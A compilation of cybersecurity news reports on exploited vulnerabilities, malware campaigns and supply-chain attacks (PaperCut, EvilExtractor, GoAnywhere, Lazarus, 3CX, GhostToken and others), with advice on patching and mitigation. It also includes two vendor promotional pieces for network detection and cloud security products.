Russian Hackers Suspected in Ongoing Exploitation of Unpatched PaperCut Servers

/in /by

Print management software provider PaperCut said that it has “evidence to suggest that unpatched servers are being exploited in the wild,” citing two vulnerability reports from cybersecurity company Trend Micro.

“PaperCut has conducted analysis on all customer reports, and the earliest signature of suspicious activity on a customer server potentially linked to this vulnerability is 14th April 01:29 AEST / 13th April 15:29 UTC,” it further added.

The update comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a critical improper access control flaw (CVE-2023-27350, CVSS score: 9.8) in PaperCut MF and NG to the Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation.

Cybersecurity company Huntress, which found about 1,800 publicly exposed PaperCut servers, said it observed PowerShell commands being spawned from PaperCut software to install remote management and maintenance (RMM) software like Atera and Syncro for persistent access and code execution on the infected hosts.

Additional infrastructure analysis has revealed the domain hosting the tools – windowservicecemter[.]com – was registered on April 12, 2023, also hosting malware like TrueBot, although the company said it did not directly detect the deployment of the downloader.

TrueBot is attributed to a Russian criminal entity known as Silence, which in turn has historical links with Evil Corp and its overlapping cluster TA505, the latter of which has facilitated the distribution of Cl0p ransomware in the past.

“While the ultimate goal of the current activity leveraging PaperCut’s software is unknown, these links (albeit somewhat circumstantial) to a known ransomware entity are concerning,” Huntress researchers said.

“Potentially, the access gained through PaperCut exploitation could be used as a foothold leading to follow-on movement within the victim network, and ultimately ransomware deployment.”

Users are recommended to upgrade to the fixed versions of PaperCut MF and NG (20.1.7, 21.2.11, and 22.0.9) as soon as possible, regardless of whether the server is “available to external or internal connections,” to mitigate potential risks.

Customers who are unable to upgrade to a security patch are advised to lock down network access to the servers by blocking all inbound traffic from external IPs and limiting IP addresses to only those belonging to verified site servers.

 

(c) Ravie Lakshmanan

New All-in-One “EvilExtractor” Stealer for Windows Systems Surfaces on the Dark Web

/in /by

A new “all-in-one” stealer malware named EvilExtractor (also spelled Evil Extractor) is being marketed for sale for other threat actors to steal data and files from Windows systems.

“It includes several modules that all work via an FTP service,” Fortinet FortiGuard Labs researcher Cara Lin said. “It also contains environment checking and Anti-VM functions. Its primary purpose seems to be to steal browser data and information from compromised endpoints and then upload it to the attacker’s FTP server.”

The network security company said it observed a surge in attacks spreading the malware in the wild in March 2023, with a majority of the victims located in Europe and the U.S. While marketed as an educational tool, EvilExtractor has been adopted by threat actors for use as an information stealer.

The attack tool is being sold by an actor named Kodex on cybercrime forums like Cracked dating back to October 22, 2022. It’s continually updated and packs in various modules to siphon system metadata, passwords and cookies from various web browsers as well as record keystrokes and even act as a ransomware by encrypting files on the target system.

The malware is also said to have been used as part of a phishing email campaign detected by the company on March 30, 2023. The emails lure recipients into launching an executable that masquerades as a PDF document under the pretext of confirming their “account details.”

The “Account_Info.exe” binary is an obfuscated Python program designed to launch a .NET loader that uses a Base64-encoded PowerShell script to launch EvilExtractor. The malware, besides gathering files, can also activate the webcam and capture screenshots.

“EvilExtractor is being used as a comprehensive info stealer with multiple malicious features, including ransomware,” Lin said. “Its PowerShell script can elude detection in a .NET loader or PyArmor. Within a very short time, its developer has updated several functions and increased its stability.”

The findings come as Secureworks Counter Threat Unit (CTU) detailed a malvertising and SEO poisoning campaign used to deliver the Bumblebee malware loader via trojanized installers of legitimate software.

Dark Web

Bumbleebee, documented first a year ago by Google’s Threat Analysis Group and Proofpoint, is a modular loader that’s primarily propagating through phishing techniques. It’s suspected to be developed by actors associated with the Conti ransomware operation as a replacement for BazarLoader.

The use of SEO poisoning and malicious ads to redirect users searching for popular tools like ChatGPT, Cisco AnyConnect, Citrix Workspace, and Zoom to rogue websites hosting tainted installers has witnessed a spike in recent months after Microsoft began blocking macros by default from Office files downloaded from the internet.

In one incident described by the cybersecurity firm, the threat actor used the Bumblebee malware to obtain an entry point and move laterally after three hours to deploy Cobalt Strike and legitimate remote access software like AnyDesk and Dameware. The attack was ultimately disrupted before it proceeded to the final ransomware stage.

“To mitigate this and similar threats, organizations should ensure that software installers and updates are only downloaded from known and trusted websites,” Secureworks said. “Users should not have privileges to install software and run scripts on their computers.”

 

(c) Ravie Lakshmanan

Fortra Sheds Light on GoAnywhere MFT Zero-Day Exploit Used in Ransomware Attacks

/in /by

Fortra, the company behind Cobalt Strike, shed light on a zero-day remote code execution (RCE) vulnerability in its GoAnywhere MFT tool that has come under active exploitation by ransomware actors to steal sensitive data.

The high-severity flaw, tracked as CVE-2023-0669 (CVSS score: 7.2), concerns a case of pre-authenticated command injection that could be abused to achieve code execution. The issue was patched by the company in version 7.1.2 of the software in February 2023, but not before it was weaponized as a zero-day since January 18.

Fortra, which worked with Palo Alto Networks Unit 42, said it was made aware of suspicious activity associated with some of the file transfer instances on January 30, 2023.

“The unauthorized party used CVE-2023-0669 to create unauthorized user accounts in some MFTaaS customer environments,” the company said. “For a subset of these customers, the unauthorized party leveraged these user accounts to download files from their hosted MFTaaS environments.”

The threat actor further abused the flaw to deploy two additional tools, dubbed “Netcat” and “Errors.jsp,” between January 28, 2023 and January 31, 2023, although not every installation attempt is said to have been successful.

Fortra said it directly reached out to affected customers, and that it has not found any sign of unauthorized access to customer systems that have been reprovisioned a “clean and secure MFTaaS environment.”

While Netcat is a legitimate program for managing reading and writing data over a network, it’s currently not known how the JSP file was used in the attacks.

The investigation also found that CVE-2023-0669 was exploited against a small number of on-premise implementations running a specific configuration of the GoAnywhere MFT solution.

As mitigations, the company is recommending that users rotate the Master Encryption Key, reset all credentials, review audit logs, and delete any suspicious admin or user accounts.

The development comes as Malwarebytes and NCC Group reported a spike in ransomware attacks during the month of March, largely driven by active exploitation of the GoAnywhere MFT vulnerability.

A total of 459 attacks were recorded last month alone, a 91% increase from February 2023 and a 62% jump when compared to March 2022.

“The ransomware-as-a-service (RaaS) provider, Cl0p, successfully exploited the GoAnywhere vulnerability and was the most active threat actor observed, with 129 victims in total,” NCC Group said.

Cl0p’s exploitation spree marks the second time LockBit has been knocked off the top spot since September 2021. Other prevalent ransomware strains included Royal, BlackCat, Play, Black Basta, and BianLian.

It’s worth noting that the Cl0p actors previously exploited zero-day flaws in Accellion File Transfer Appliance (FTA) to breach several targets in 2021.

 

(c) Ravie Lakshmanan

Lazarus Group Adds Linux Malware to Arsenal in Operation Dream Job

/in /by

The notorious North Korea-aligned state-sponsored actor known as the Lazarus Group has been attributed to a new campaign aimed at Linux users.

The attacks are part of a persistent and long-running activity tracked under the name Operation Dream Job, ESET said in a new report published today.

The findings are crucial, not least because it marks the first publicly documented example of the adversary using Linux malware as part of this social engineering scheme.

Operation Dream Job, also known as DeathNote or NukeSped, refers to multiple attack waves wherein the group leverages fraudulent job offers as a lure to trick unsuspecting targets into downloading malware. It also exhibits overlaps with two other Lazarus clusters known as Operation In(ter)ception and Operation North Star.

The attack chain discovered by ESET is no different in that it delivers a fake HSBC job offer as a decoy within a ZIP archive file that’s then used to launch a Linux backdoor named SimplexTea distributed via an OpenDrive cloud storage account.

Linux Malware

While the exact method used to distribute the ZIP file is not known, it’s suspected to be either spear-phishing or direct messages on LinkedIn. The backdoor, written in C++, bears similarities to BADCALL, a Windows trojan previously attributed to the group.

Furthermore, ESET said it identified commonalities between artifacts used in the Dream Job campaign and those unearthed as part of the supply chain attack on VoIP software developer 3CX that came to light last month.

This also includes the command-and-control (C2) domain “journalide[.]org,” which was listed as one of the four C2 servers used by malware families detected within the 3CX environment.

Indications are that preparations for the supply chain attack had been underway since December 2022, when some of the components were committed to the GitHub code-hosting platform.

The findings not only strengthen the existing link between Lazarus Group and the 3CX compromise, but also demonstrates the threat actor’s continued success with staging supply chain attacks since 2020.

 

(c) Ravie Lakshmanan

Beyond Traditional Security: NDR’s Pivotal Role in Safeguarding OT Networks

/in /by

Why is Visibility into OT Environments Crucial?

The significance of Operational Technology (OT) for businesses is undeniable as the OT sector flourishes alongside the already thriving IT sector. OT includes industrial control systems, manufacturing equipment, and devices that oversee and manage industrial environments and critical infrastructures. In recent years, adversaries have recognized the lack of detection and protection in many industrial systems and are actively exploiting these vulnerabilities. In response, IT security leaders have become more aware of the need to protect their OT environments with security monitoring and response capabilities. This development was accelerated by severe past cyber incidents targeting critical OT environments and even causing physical damage to infrastructures. Given the pivotal role these systems play in business operations and modern society, ensuring their security is of utmost importance.

The underlying trend is clear: OT and IoT networks are progressively integrated with traditional IT networks for management and access purposes, leading to increased communication between these devices both internally and externally. This not only affects the networks itself but also carries significant ramifications for the security teams responsible for safeguarding the environment. Although this convergence of OT and IT offers numerous benefits, such as enhanced efficiency and reduced operational costs, it also gives rise to new security risks and challenges, rendering OT environments more vulnerable to cyber threats. As evidenced by past attacks, these threats often go undetected due to insufficient security monitoring, allowing threat actors to remain undetected for extended durations. As a result, achieving holistic visibility and effective anomaly detection in OT environments is pivotal for maintaining steadfast security and control.

What Challenges Arise in Monitoring OT Environments?

First and foremost, understanding the unique threat landscape of OT environments is crucial. Traditional IT security detection methods fall short in this context, as they require different sensitivity thresholds and more refined monitoring for network segments or device groups, as well as OT-specific detection mechanisms. Unlike IT attacks that focus on data theft, OT attacks typically aim for physical impact. Moreover, as recent examples demonstrate, ransomware in the context of OT is on the rise and directly affects the availability of control systems and safety.

Second, monitoring OT environments requires the consideration of various aspects, such as supplier access management, device management, and network communications. Controlling and overseeing supplier access to OT and IoT networks is challenging, as connections between external and internal networks can occur through various means like VPNs, direct mobile connections, and jump hosts. Another hurdle is device management, which encompasses update mechanisms and protection against unauthorized access or manipulation. Implementing regular updating routines and deploying Endpoint Detection & Response (EDR) on OT and IoT devices is often limited or infeasible. The variety of devices, their life spans, and device-specific operating systems make deploying security software to monitor OT devices difficult and cumbersome.

Third, traditional IT network detection methods require in-depth protocol knowledge, which, in the OT context, includes a wide range of different protocols and attack scenarios absent in traditional rule sets. OT network devices connect IoT sensors and machines using communication protocols uncommon in traditional IT networks. In terms of more intrusive security solutions, active vulnerability scanning methods can also be problematic in OT environments, as they may cause disruptions or even outages. The same applies to Intrusion Prevention Systems (IPS) because they could block network packets, impacting stability and business continuity in OT environments. As a result, passive network detection systems like Network Detection & Response (NDR) solutions are better suited for this purpose.

How Can I Effectively Monitor and Secure My OT Environment?

While secure access management and device lifecycle management are essential, their seamless implementation can be incredibly challenging. In this context, Network Detection and Response (NDR) solutions offer a non-intrusive and effective approach to monitoring OT environments. By focusing on communication patterns for OT devices, the intersection between IT and OT, and third-party access to OT networks, NDR systems provide comprehensive visibility and detection capabilities without disrupting industrial operations and business processes.

In particular, NDR solutions with advanced baselining capabilities excel at identifying new and unusual communication patterns that could indicate malicious activities within OT networks. Utilizing flow information for baselining, these NDR systems provide protocol and device-independent anomaly detection by learning who communicates with whom and at what frequency. Instead of manually configuring these parameters, the NDR learns the baseline and alerts the security teams on unusual requests or changes in the frequency. In addition, a flexible use case framework allows setting fine-tuned thresholds for OT-specific monitoring, including the ability to set load monitoring with network zone-specific granularity. Moreover, the use of Machine Learning algorithms allows for more accurate detection of anomalies and potential threats compared to traditional rule-based systems.

As a result, the passive monitoring capabilities of NDR solutions are vital for OT and IoT environments, where alternative monitoring methods may be difficult to implement or cause disruptions. ExeonTrace, a particularly robust and easy-to-implement ML-driven NDR system for OT environments, analyzes log data from traditional IT environments, OT networks, and jump host gateways, to provide a comprehensive and holistic view of network activity. Therein, the flexibility of integrating various third-party log sources, such as OT-specific logs, is crucial. Moreover, ExeonTrace’s ability to integrate with other OT-specific detection platforms enhances its capabilities and ensures extensive security coverage.

Safeguarding OT Networks
ExeonTrace Platform: OT Network Visibility

In summary, NDR solutions like ExeonTrace effectively address the distinct challenges of OT monitoring, establishing the Swiss NDR system as the favored detection approach for safeguarding OT environments. By implementing ML-driven NDR systems like ExeonTrace, organizations can reliably monitor and secure their industrial operations, ensuring business continuity through an automated, efficient, and hardware-free approach. Find out if ExeonTrace is the ideal solution for your business and request a demo today.

 

(c) Ravie Lakshmanan

Two Critical Flaws Found in Alibaba Cloud’s PostgreSQL Databases

/in /by

A chain of two critical flaws has been disclosed in Alibaba Cloud’s ApsaraDB RDS for PostgreSQL and AnalyticDB for PostgreSQL that could be exploited to breach tenant isolation protections and access sensitive data belonging to other customers.

“The vulnerabilities potentially allowed unauthorized access to Alibaba Cloud customers’ PostgreSQL databases and the ability to perform a supply chain attack on both Alibaba database services, leading to an RCE on Alibaba database services,” cloud security firm Wiz said in a new report shared with The Hacker News.

The issues, dubbed BrokenSesame, were reported to Alibaba Cloud in December 2022, following mitigations were deployed by the company on April 12, 2023. There is no evidence to suggest that the weaknesses were exploited in the wild.

In a nutshell, the vulnerabilities – a privilege escalation flaw in AnalyticDB and a remote code execution bug in ApsaraDB RDS – made it possible to elevate privileges to root within the container, escape to the underlying Kubernetes node, and ultimately obtain unauthorized access to the API server.

Armed with this capability, an attacker could retrieve credentials associated with the container registry from the API server and push a malicious image to gain control of customer databases belonging to other tenants on the shared node.

Alibaba Cloud PostgreSQL Databases

“The credentials used to pull images were not scoped correctly and allowed push permissions, laying the foundation for a supply-chain attack,” Wiz researchers Ronen Shustin and Shir Tamari said.

This is not the first time PostgreSQL vulnerabilities have been identified in cloud services. Last year, Wiz uncovered similar issues in Azure Database for PostgreSQL Flexible Server (ExtraReplica) and IBM Cloud Databases for PostgreSQL (Hell’s Keychain).

The findings come as Palo Alto Networks Unit 42, in its Cloud Threat Report, revealed that “threat actors have become adept at exploiting common, everyday issues in the cloud,” including misconfigurations, weak credentials, lack of authentication, unpatched vulnerabilities and malicious open source software (OSS) packages.

“76% of organizations don’t enforce MFA [multi-factor authentication] for console users, while 58% of organizations don’t enforce MFA for root/admin users,” the cybersecurity firm said.

 

(c) Ravie Lakshmanan

Cisco and VMware Release Security Updates to Patch Critical Flaws in their Products

/in /by

Cisco and VMware have released security updates to address critical security flaws in their products that could be exploited by malicious actors to execute arbitrary code on affected systems.

The most severe of the vulnerabilities is a command injection flaw in Cisco Industrial Network Director (CVE-2023-20036, CVSS score: 9.9), which resides in the web UI component and arises as a result of improper input validation when uploading a Device Pack.

“A successful exploit could allow the attacker to execute arbitrary commands as NT AUTHORITY\SYSTEM on the underlying operating system of an affected device,” Cisco said in an advisory released on April 19, 2023.

The networking equipment major also resolved a medium-severity file permissions vulnerability in the same product (CVE-2023-20039, CVSS score: 5.5) that an authenticated, local attacker could abuse to view sensitive information.

Patches have been made available in version 1.11.3, with Cisco crediting an unnamed “external” researcher for reporting the two issues.

Also fixed by Cisco is another critical flaw in the external authentication mechanism of the Modeling Labs network simulation platform. Tracked as CVE-2023-20154 (CVSS score: 9.1), the vulnerability could permit an unauthenticated, remote attacker to access the web interface with administrative privileges.

“To exploit this vulnerability, the attacker would need valid user credentials that are stored on the associated external authentication server,” the company noted.

“If the LDAP server is configured in such a way that it will reply to search queries with a non-empty array of matching entries (replies that contain search result reference entries), this authentication bypass vulnerability can be exploited.”

While there are workarounds that plug the security hole, Cisco cautions customers to test the effectiveness of such remediations in their own environments before administering them. The shortcoming has been patched with the release of version 2.5.1.

VMware ships updates for Aria Operations for Logs

VMware, in an advisory released on April 20, 2023, warned of a critical deserialization flaw impacting multiple versions of Aria Operations for Logs (CVE-2023-20864, CVSS score: 9.8).

“An unauthenticated, malicious actor with network access to VMware Aria Operations for Logs may be able to execute arbitrary code as root,” the virtualization services provider said.

VMware Aria Operations for Logs 8.12 fixes this vulnerability along with a high-severity command injection flaw (CVE-2023-20865, CVSS score: 7.2) that could allow an attacker with admin privileges to run arbitrary commands as root.

“CVE-2023-20864 is a critical issue and should be patched immediately,” the company said. “It needs to be highlighted that only version 8.10.2 is impacted by this vulnerability.”

The alert comes almost three months after VMware plugged two critical issues in the same product (CVE-2022-31704 and CVE-2022-31706, CVSS scores: 9.8) that could result in remote code execution.

With Cisco and VMware appliances turning out to be lucrative targets for threat actors, it’s recommended that users move quickly to apply the updates to mitigate potential threats.

 

(c) Ravie Lakshmanan

N.K. Hackers Employ Matryoshka Doll-Style Cascading Supply Chain Attack on 3CX

/in /by

The supply chain attack targeting 3CX was the result of a prior supply chain compromise associated with a different company, demonstrating a new level of sophistication with North Korean threat actors.

Google-owned Mandiant, which is tracking the attack event under the moniker UNC4736said the incident marks the first time it has seen a “software supply chain attack lead to another software supply chain attack.”

The Matryoshka doll-style cascading attack against 3CX first came to light on March 29, 2023, when it emerged that Windows and macOS versions of its communication software were trojanized to deliver a C/C++-based data miner named ICONIC Stealer by means of a downloader, SUDDENICON, that used icon files hosted on GitHub to extract the server containing the stealer.

“The malicious application next attempts to steal sensitive information from the victim user’s web browser,” the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said in an analysis of the malware. “Specifically it will target the Chrome, Edge, Brave, or Firefox browsers.”

Select attacks targeting cryptocurrency companies also entailed the deployment of a next-stage backdoor referred to as Gopuram that’s capable of running additional commands and interacting with the victim’s file system.

Mandiant’s investigation into the sequence of events has now revealed the patient zero to be a malicious version of a now-discontinued software provided by a fintech company called Trading Technologies, which was downloaded by a 3CX employee to their personal computer.

It described the initial intrusion vector as “a malware-laced software package distributed via an earlier software supply chain compromise that began with a tampered installer for X_TRADER.”

This rogue installer, in turn, contained a setup binary that dropped two trojanized DLLs and an innocuous executable, the latter of which is used to side-load one of the DLLs that’s camouflaged as a legitimate dependency.

The attack chain then made use of open source tools like SIGFLIP and DAVESHELL to ultimately extract and execute VEILEDSIGNAL, a multi-stage modular backdoor written in C that’s capable of sending data, executing shellcode, and terminating itself.

The initial compromise of the employee’s personal computer using VEILEDSIGNAL enabled the threat actor to obtain the individual’s corporate credentials, two days after which the first unauthorized access of 3CX’s network took place via a VPN by taking advantage of the stolen credentials.

Cascading Supply Chain Attack on 3CX

Besides identifying tactical similarities between the compromised X_TRADER and 3CXDesktopApp apps, Mandiant found that the threat actor subsequently laterally moved within the 3CX environment and breached the Windows and macOS build environments.

“On the Windows build environment, the attacker deployed a TAXHAUL launcher and COLDCAT downloader that persisted by performing DLL side-loading through the IKEEXT service and ran with LocalSystem privileges,” Mandiant said. “The macOS build server was compromised with POOLRAT backdoor using Launch Daemons as a persistence mechanism.”

POOLRAT, previously classified by the threat intelligence firm as SIMPLESEA, is a C/C++ macOS implant capable of collecting basic system information and executing arbitrary commands, including carrying out file operations.

UNC4736 is suspected to be a threat group with North Korean nexus, an assessment that’s been reinforced by ESET’s discovery of an overlapping command-and-control (C2) domain (journalide[.]org) employed in the supply chain attack and that of a Lazarus Group campaign called Operation Dream Job.

Evidence gathered by Mandiant shows that the group exhibits commonalities with another intrusion set tracked as Operation AppleJeus, which has a track record of carrying out financially motivated attacks.

What’s more, the breach of Trading Technologies’ website is said to have taken place in early February 2022 to activate a multi-stage infection chain responsible for serving unknown payloads to the site visitors by weaponizing a then zero-day flaw in Google Chrome (CVE-2022-0609).

“The site www.tradingtechnologies[.]com was compromised and hosting a hidden IFRAME to exploit visitors, just two months before the site was known to deliver a trojanized X_TRADER software package,” Mandiant explained.

Another link connecting it to AppleJeus is the threat actor’s previous use of an older version of POOLRAT as part of a long-running campaign disseminating booby-trapped trading applications like CoinGoTrade to facilitate cryptocurrency theft.

The entire scale of the campaign remains unknown, and it’s currently not clear if the compromised X_TRADER software was used by other firms. The platform was purportedly decommissioned in April 2020, but it was still available to download from the site in 2022.

3CX, in an update shared on April 20, 2023, said it’s taking steps to harden its systems and minimize the risk of nested software-in-software supply chain attacks by enhancing product security, incorporating tools to ensure the integrity of its software, and establishing a new department for Network Operations and Security.

“Cascading software supply chain compromises demonstrate that North Korean operators can exploit network access in creative ways to develop and distribute malware, and move between target networks while conducting operations aligned with North Korea’s interests,” Mandiant said.

 

(c) Ravie Lakshmanan

14 Kubernetes and Cloud Security Challenges and How to Solve Them

/in /by

Recently, Andrew Martin, founder and CEO of ControlPlane, released a report entitled Cloud Native and Kubernetes Security Predictions 2023. These predictions underscore the rapidly evolving landscape of Kubernetes and cloud security, emphasizing the need for organizations to stay informed and adopt comprehensive security solutions to protect their digital assets.

In response, Uptycs, the first unified CNAPP and XDR platform, released a whitepaper, “14 Kubernetes and Cloud Security Predictions for 2023 and How Uptycs Meets Them Head-On” addressing the most pressing challenges and trends in Kubernetes and cloud security for 2023. Uptycs explains how their unified CNAPP and XDR solution is designed to tackle these emerging challenges head-on.

Read on for key takeaways from the whitepaper and learn how Uptycs helps modern organizations successfully navigate the evolving landscape of Kubernetes and cloud security.

14 Kubernetes and Cloud Security Predictions for 2023

  1. CVEs continue to rampage and tear through the supply chain
  2. Kubernetes RBAC and security complexity continue to intensify
  3. Passwords and credentials will continue to be stolen as zero trust is slow to be adopted
  4. AI and machine learning (ML) will be harnessed by attackers more effectively than defenders
  5. eBPF technology powers all new connectivity, security, and observability projects
  6. CISOs will shoulder unjust legal responsibility, causing the talent shortage to be exacerbated
  7. Automated defensive remediation will continue to grow slowly
  8. Vulnerability exploitability eXchange (VEX) sees initial adoption
  9. Linux kernel ships its first Rust module
  10. Closed-source vendors face calls for SBOM delivery to derive mean time to remediation (MTTR) statistics
  11. Cybersecurity insurance policies will increasingly descope ransomware and negligence as governments increase fines
  12. Server-side WebAssembly tooling starts to proliferate after Docker’s alpha driver
  13. New legislation will continue to force standards that risk lack of real-world adoption or testing
  14. Confidential computing starts to be put through high-throughput test cases

As organizations navigate the complex landscape of Kubernetes and cloud security, it is important to stay informed and adopt the right solutions. Uptycs offers strategies for effectively addressing these concerns and maintaining a robust security posture. To gain a comprehensive understanding of the subject, download the Uptycs whitepaper, “14 Kubernetes and Cloud Security Predictions for 2023 and How Uptycs Meets Them Head-On.

1. Addressing Supply Chain Security Concerns

The prediction that CVEs will continue to wreak havoc on supply chains emphasizes the importance of securing the software development lifecycle. Uptycs recognizes the need for robust vulnerability management and provides solutions for detecting and responding to threats in real-time. With Uptycs, organizations can identify and prioritize vulnerabilities, speeding up the mean time to detection (MTTD) and mean time to remediation (MTTR) of potential threats.

2. Tackling Kubernetes Security Complexity

As Kubernetes Role-Based Access Control (RBAC) and security complexity intensifies, organizations require better visibility and management tools. Uptycs offers a comprehensive Kubernetes Security Posture Management (KSPM) solution that provides clear visibility and control across Kubernetes clusters in various environments, such as Google GKE, AWS EKS, Azure AKS, Kubernetes, OpenShift, VMware Tanzu, and Google Anthos. This single solution streamlines security management and ensures a robust security posture.

3. Combatting Credential Theft and Slow Zero Trust Adoption

Credential theft remains a significant concern, and the slow adoption of zero-trust security models exacerbates this issue. Uptycs addresses these challenges by offering solutions such as Cloud Infrastructure Entitlements Management (CIEM), which provides a breakdown of cloud identity risk and governance based on identity types, credentials, activity, and control plane misconfigurations. With Uptycs, security teams can better protect their cloud resources and infrastructure from unauthorized access, misuse, and insider threats.

4. Harnessing AI and ML for Robust Security Measures

With the increasing use of AI and machine learning by attackers, organizations must leverage these technologies to enhance their defense strategies. Uptycs offers advanced threat detection and response capabilities that harness the power of AI and ML, providing the necessary context for analysts to quickly triage and investigate potential threats. By staying ahead of attackers in the AI and ML arms race, Uptycs helps organizations maintain a strong security posture.

5. Embracing eBPF Technology for Improved Connectivity, Security, and Observability

Uptycs predicts that eBPF technology will power new connectivity, security, and observability projects in 2023. As a cloud-native security platform, Uptycs leverages eBPF for deep telemetry collection and analysis, offering real-time visibility and threat detection across diverse environments. This adoption of cutting-edge technology ensures that Uptycs remains at the forefront of cloud and Kubernetes security.

The whitepaper predicts that CISOs will continue to shoulder unjust legal responsibility, worsening the talent shortage in cybersecurity. Uptycs helps alleviate this burden by providing a unified platform that streamlines security management and consolidates various security functions. With Uptycs, organizations can reduce risk by prioritizing responses to threats, vulnerabilities, and compliance mandates across their modern attack surface from a single user interface.

7. Promoting Automated Defensive Remediation

Although automated defensive remediation is expected to grow slowly, Uptycs offers sophisticated remediation options, including actions like quarantine host, kill container, kill process, delete file, or run script. These actions can be configured for specific events, ensuring that organizations can efficiently respond to potential threats and maintain a strong security posture.

8. Supporting Vulnerability exploitability eXchange (VEX) Adoption

As the Vulnerability exploitability eXchange (VEX) sees initial adoption, Uptycs’ comprehensive vulnerability management solutions enable organizations to better identify, prioritize, and remediate vulnerabilities in their environments. This support for emerging standards ensures that Uptycs remains a leader in Kubernetes and cloud security.

9. Embracing Rust in Linux Kernel

With the Linux kernel shipping its first Rust module, Uptycs recognizes the importance of adapting to the evolving technological landscape. By staying abreast of the latest developments in programming languages and security technologies, Uptycs ensures that its solutions remain relevant and effective in a rapidly changing industry.

10. Addressing Closed-Source Vendor Concerns and SBOM Delivery

As closed-source vendors face calls for SBOM delivery to derive MTTR statistics, Uptycs’ open standards-based platform offers transparency and extensibility. This approach helps organizations maintain control over their security and IT data, avoiding reliance on black-box solutions and ensuring robust security measures.

11. Navigating the Changing Landscape of Cybersecurity Insurance

With cybersecurity insurance policies increasingly descoping ransomware and negligence as governments increase fines, organizations need comprehensive security solutions more than ever. Uptycs’ unified platform offers advanced threat detection, vulnerability management, and remediation capabilities, providing organizations with the tools they need to mitigate risks and protect their digital assets.

12. Supporting Server-Side WebAssembly Tooling Proliferation

As server-side WebAssembly tooling starts to proliferate after Docker’s alpha driver, Uptycs stays at the forefront of technological innovation, ensuring that its platform remains relevant and effective in addressing emerging security challenges.

13. Adapting to New Legislation and Standards

Uptycs recognizes the challenges posed by new legislation that forces standards, which risk a lack of real-world adoption or testing. By offering a comprehensive platform that covers hybrid cloud, containers, laptops, and servers, Uptycs enables organizations to adapt to evolving regulatory requirements and maintain a strong security posture.

14. Pioneering Confidential Computing

As confidential computing starts to be put through high-throughput test cases, Uptycs is well-positioned to embrace this emerging technology. By staying ahead of the curve and incorporating cutting-edge developments, Uptycs ensures that its platform remains a top choice for organizations seeking robust Kubernetes and cloud security solutions.

Uptycs: A Proactive Approach to Mastering Kubernetes and Cloud Security Challenges

Organizations that want to stay ahead of the curve and better protect their digital assets in the complex landscape of Kubernetes and cloud security should embrace the latest developments in technology and security.

Download the whitepaper now to learn how Uptycs’ unified CNAPP and XDR meets these challenges head-on, offering advanced solutions for threat detection, vulnerability management, remediation, and more.

Stay informed and watch Uptycs Cybersecurity Standup about The Future of Containers and Kubernetes Security. Uptycs hosts weekly LinkedIn Live Cybersecurity Standups every Thursday, where you can join in the conversation on this and other hot topics in the cybersecurity world.

 

(c) Ravie Lakshmanan

GhostToken Flaw Could Let Attackers Hide Malicious Apps in Google Cloud Platform

/in /by

Cybersecurity researchers have disclosed details of a now-patched zero-day flaw in Google Cloud Platform (GCP) that could have enabled threat actors to conceal an unremovable, malicious application inside a victim’s Google account.

Dubbed GhostToken by Israeli cybersecurity startup Astrix Security, the shortcoming impacts all Google accounts, including enterprise-focused Workspace accounts. It was discovered and reported to Google on June 19, 2022. The company deployed a global-patch more than nine months later on April 7, 2023.

“The vulnerability […] allows attackers to gain permanent and unremovable access to a victim’s Google account by converting an already authorized third-party application into a malicious trojan app, leaving the victim’s personal data exposed forever,” Astrix said in a report.

In a nutshell, the flaw makes it possible for an attacker to hide their malicious app from a victim’s Google account application management page, thereby effectively preventing users from revoking its access.

This is achieved by deleting the GCP project associated with the authorized OAuth application, causing it to go in a “pending deletion” state. The threat actor, armed with this capability, could then unhide the rogue app by restoring the project and use the access token to obtain the victim’s data, and make it invisible again.

Google Cloud Platform

“In other words, the attacker holds a ‘ghost’ token to the victim’s account,” Astrix said.

The kind of data that can be accessed depends on the permissions granted to the app, which the adversaries can abuse to delete files from Google Drive, write emails on the victim’s behalf to perform social engineering attacks, track locations, and exfiltrate sensitive data from Google Calendar, Drive, Photos, and other apps.

“Victims may unknowingly authorize access to such malicious applications by installing a seemingly innocent app from the Google Marketplace or one of the many productivity tools available online,” Astrix added.

“Once the malicious app has been authorized, an attacker exploiting the vulnerability can bypass Google’s ‘Apps with access to your account’ management feature, which is the only place where Google users can view third-party apps connected to their account.”

Google’s patch addresses the problem by now also displaying apps that are in a pending deletion state on the third-party access page, allowing users to revoke the permission granted to such apps.

The development comes as Google Cloud fixed a privilege escalation flaw in the Cloud Asset Inventory API dubbed Asset Key Thief that could be exploited to steal user-managed Service Account private keys and gain access to valuable data. The issue, which was discovered by SADA earlier this February, was patched by the tech giant on March 14, 2023.

The findings also arrive a little over a month after cloud incident response firm Mitiga revealed that adversaries could take advantage of “insufficient” forensic visibility into GCP to exfiltrate sensitive data.

 

(c) Ravie Lakshmanan